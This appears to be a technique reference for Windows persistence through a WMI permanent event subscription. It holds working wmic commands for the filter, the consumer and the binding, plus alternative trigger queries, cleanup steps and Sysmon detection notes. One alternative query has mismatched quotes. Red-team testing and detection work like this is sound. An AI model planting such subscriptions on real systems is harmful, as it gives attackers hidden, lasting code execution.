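This persistence method is a WMI permanent event subscription (MITRE ATT&CK T1546.003). It uses the Win32_PerfFormattedData_PerfOS_System class and an uptime range to execute a binary after startup, once the system uptime is between 240 and 325 seconds. The three commands below create the event filter, the command-line consumer, and the binding that links them.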
REM Step 1 of 3 - event filter. Registers an __EventFilter named "Whatever" in
REM root\subscription. The WQL query polls every 60 seconds (WITHIN 60) and matches
REM while SystemUpTime is >= 240 and < 325.
REM Defender note: Sysmon Event ID 19 (WmiEventFilter activity) records the filter and its query text.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Whatever", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
REM Step 2 of 3 - consumer. Registers a CommandLineEventConsumer named "Whatever" whose
REM ExecutablePath and CommandLineTemplate both point at the placeholder YourBinary.exe.
REM Defender note: Sysmon Event ID 20 (WmiEventConsumer activity) records the consumer and its command line.
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Whatever", ExecutablePath="C:\Windows\System32\YourBinary.exe",CommandLineTemplate="C:\Windows\System32\YourBinary.exe"
REM Step 3 of 3 - binding. Links the filter to the consumer by name; without this
REM __FilterToConsumerBinding the other two objects do nothing.
REM Defender note: Sysmon Event ID 21 (WmiEventConsumerToFilter activity) records the binding;
REM Microsoft-Windows-WMI-Activity/Operational Event ID 5861 also logs permanent subscription bindings.
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Whatever\"", Consumer="CommandLineEventConsumer.Name=\"Whatever\""
Cleanup
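REM Removes the consumer, the filter, and the binding created under the name "Whatever".
REM All three must be deleted: a leftover filter or consumer can be re-armed with a new binding.
REM Run from an elevated prompt; root\subscription is writable by administrators only.
REM Fix: the consumer delete was missing the WHERE keyword that the other two commands use.
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE name="Whatever" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE name="Whatever" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name=\"Whatever\"" DELETE
REM NOTE(review): wmic is deprecated on current Windows releases; if it is unavailable, the same
REM objects can be listed and removed from PowerShell with Get-CimInstance / Remove-CimInstance
REM against the root\subscription namespace.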
Additional EventFilter options (alternative values for the Query parameter of the __EventFilter):
QUERY="SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= "chrome.exe"
QUERY="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2"
References:
Win32_PerfFormattedData_PerfOS_System
PowershellOne
Liberty-Shell